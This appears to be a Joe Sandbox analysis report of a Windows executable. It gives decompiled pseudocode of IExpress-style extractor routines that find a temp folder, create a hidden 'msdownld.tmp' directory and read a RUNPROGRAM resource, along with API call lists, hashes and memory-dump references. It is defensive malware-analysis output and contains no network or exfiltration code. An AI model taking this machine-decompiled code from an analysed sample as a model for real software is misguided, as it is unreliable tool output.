                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                        • Instruction ID: c3084d0e2f996b7c77293d138436475bf63e07ca5546ba7a1a7f64fc9970671f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C11AC313012067BDF20ABF9AD89F6F37E9AB89391B05012BB901D7291DE31DC0287A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A96F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00A96EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00a96f45
                                                                                                                                                                                                        0x00a96f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A96F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                        • Instruction ID: 170315c71201bf958f06280dc98a750d9ff9d8ab52585a099303385348cc0bd0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4090026435111057DA105BB09D1941575D16E5D642B915962A011C4494DF6044415552
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph for the function at a955a0; nodes are marked Executed or Not Executed. Graph image not reproduced.]
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00A955A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E00A9468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E00A9468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xa99a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xa98b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xa98a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00A96517(_t82, 0x7d2, 0, E00A93210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xa99a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xa991e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xa991e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00A91781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E00A96952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E00A9597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E00A92630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E00A9658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0xa991e4;
                                                                                                                                                                                                        																					E00A91781(0xa991e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E00A95467(0xa991e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E00A92630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E00A9597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E00A95467(0xa991e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xa991e4;
                                                                                                                                                                                                        											_t70 = E00A92630(0, 0xa991e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xa991e4;
                                                                                                                                                                                                        												_t71 = E00A95467(0xa991e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E00A9597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xa98b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E00A95467(0xa98b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E00A944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xa99124 = E00A96285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E00A96CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00a95705
                                                                                                                                                                                                        0x00a9570a
                                                                                                                                                                                                        0x00a95711
                                                                                                                                                                                                        0x00a95717
                                                                                                                                                                                                        0x00a95724
                                                                                                                                                                                                        0x00a95726
                                                                                                                                                                                                        0x00a95729
                                                                                                                                                                                                        0x00a95730
                                                                                                                                                                                                        0x00a95737
                                                                                                                                                                                                        0x00a9573d
                                                                                                                                                                                                        0x00a95740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9572b
                                                                                                                                                                                                        0x00a9572b
                                                                                                                                                                                                        0x00a9572e
                                                                                                                                                                                                        0x00a95742
                                                                                                                                                                                                        0x00a95742
                                                                                                                                                                                                        0x00a95745
                                                                                                                                                                                                        0x00a9576b
                                                                                                                                                                                                        0x00a9576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95747
                                                                                                                                                                                                        0x00a95747
                                                                                                                                                                                                        0x00a9574d
                                                                                                                                                                                                        0x00a9574f
                                                                                                                                                                                                        0x00a95771
                                                                                                                                                                                                        0x00a95771
                                                                                                                                                                                                        0x00a95773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95751
                                                                                                                                                                                                        0x00a95751
                                                                                                                                                                                                        0x00a95753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95755
                                                                                                                                                                                                        0x00a9575b
                                                                                                                                                                                                        0x00a95760
                                                                                                                                                                                                        0x00a95762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95764
                                                                                                                                                                                                        0x00a95764
                                                                                                                                                                                                        0x00a95769
                                                                                                                                                                                                        0x00a9577e
                                                                                                                                                                                                        0x00a9577e
                                                                                                                                                                                                        0x00a95781
                                                                                                                                                                                                        0x00a95788
                                                                                                                                                                                                        0x00a9578d
                                                                                                                                                                                                        0x00a9578f
                                                                                                                                                                                                        0x00a957b2
                                                                                                                                                                                                        0x00a957b8
                                                                                                                                                                                                        0x00a957bd
                                                                                                                                                                                                        0x00a957bf
                                                                                                                                                                                                        0x00a957cd
                                                                                                                                                                                                        0x00a957cd
                                                                                                                                                                                                        0x00a957dd
                                                                                                                                                                                                        0x00a957e3
                                                                                                                                                                                                        0x00a957ef
                                                                                                                                                                                                        0x00a957f5
                                                                                                                                                                                                        0x00a957f8
                                                                                                                                                                                                        0x00a9580a
                                                                                                                                                                                                        0x00a9580a
                                                                                                                                                                                                        0x00a957fa
                                                                                                                                                                                                        0x00a95802
                                                                                                                                                                                                        0x00a95802
                                                                                                                                                                                                        0x00a9580d
                                                                                                                                                                                                        0x00a9580f
                                                                                                                                                                                                        0x00a95830
                                                                                                                                                                                                        0x00a95836
                                                                                                                                                                                                        0x00a9583d
                                                                                                                                                                                                        0x00a9584b
                                                                                                                                                                                                        0x00a95851
                                                                                                                                                                                                        0x00a95855
                                                                                                                                                                                                        0x00a9585a
                                                                                                                                                                                                        0x00a9585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9585e
                                                                                                                                                                                                        0x00a9585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9585e
                                                                                                                                                                                                        0x00a95811
                                                                                                                                                                                                        0x00a95817
                                                                                                                                                                                                        0x00a95819
                                                                                                                                                                                                        0x00a9581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9581f
                                                                                                                                                                                                        0x00a95791
                                                                                                                                                                                                        0x00a95797
                                                                                                                                                                                                        0x00a9579c
                                                                                                                                                                                                        0x00a9579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a957a0
                                                                                                                                                                                                        0x00a957a9
                                                                                                                                                                                                        0x00a957ae
                                                                                                                                                                                                        0x00a957b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a957b0
                                                                                                                                                                                                        0x00a9579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95769
                                                                                                                                                                                                        0x00a95762
                                                                                                                                                                                                        0x00a95753
                                                                                                                                                                                                        0x00a9574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95864
                                                                                                                                                                                                        0x00a95864
                                                                                                                                                                                                        0x00a95864
                                                                                                                                                                                                        0x00a95717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956c3
                                                                                                                                                                                                        0x00a956c5
                                                                                                                                                                                                        0x00a956c9
                                                                                                                                                                                                        0x00a956ce
                                                                                                                                                                                                        0x00a956d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956d6
                                                                                                                                                                                                        0x00a956d6
                                                                                                                                                                                                        0x00a956d8
                                                                                                                                                                                                        0x00a956dd
                                                                                                                                                                                                        0x00a956df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a956e1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A955CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A95638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00A9564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95620
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A956B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A9571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A95737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A957CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A957EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A95802
                                                                                                                                                                                                          • Part of subcall function 00A92630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A92654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A95830
                                                                                                                                                                                                          • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                          • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                          • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                          • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A95878
                                                                                                                                                                                                          • Part of subcall function 00A9597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                          • Part of subcall function 00A9597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-3855382519
                                                                                                                                                                                                        • Opcode ID: bfc875d16ecaffe8fa18e406d763ac7356fbc2aa617213f405980fca87a38853
                                                                                                                                                                                                        • Instruction ID: bd5488a182c014e6690fe4457a7eb7d425e30b7b6f5d84a7a3cafbe513ae0522
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfc875d16ecaffe8fa18e406d763ac7356fbc2aa617213f405980fca87a38853
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34812870F04A156BDF22ABB49D86BEE72ED9F64340F040466F586D2191EF748EC28B50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 a944b9-a944f8 407 a94679-a9467b 406->407 408 a944fe-a94525 LoadStringA 406->408 411 a9467c-a9468c call a96ce0 407->411 409 a94562-a94568 408->409 410 a94527-a9452e call a9681f 408->410 414 a9456b-a94570 409->414 420 a9453f 410->420 421 a94530-a9453d call a967c9 410->421 414->414 415 a94572-a9457c 414->415 418 a945c9-a945cb 415->418 419 a9457e-a94580 415->419 424 a945cd-a945cf 418->424 425 a94607-a94617 LocalAlloc 418->425 422 a94583-a94588 419->422 426 a94544-a94554 MessageBoxA 420->426 421->420 421->426 422->422 429 a9458a-a9458c 422->429 431 a945d2-a945d7 424->431 427 a9455a-a9455d 425->427 428 a9461d-a94628 call a91680 425->428 426->427 427->411 435 a9462d-a9463d MessageBeep call a9681f 428->435 433 a9458f-a94594 429->433 431->431 434 a945d9-a945ed LocalAlloc 431->434 433->433 436 a94596-a945ad LocalAlloc 433->436 434->427 437 a945f3-a94605 call a9171e 434->437 444 a9463f-a9464c call a967c9 435->444 445 a9464e 435->445 436->427 439 a945af-a945c7 call a9171e 436->439 437->435 439->435 444->445 448 a94653-a94677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
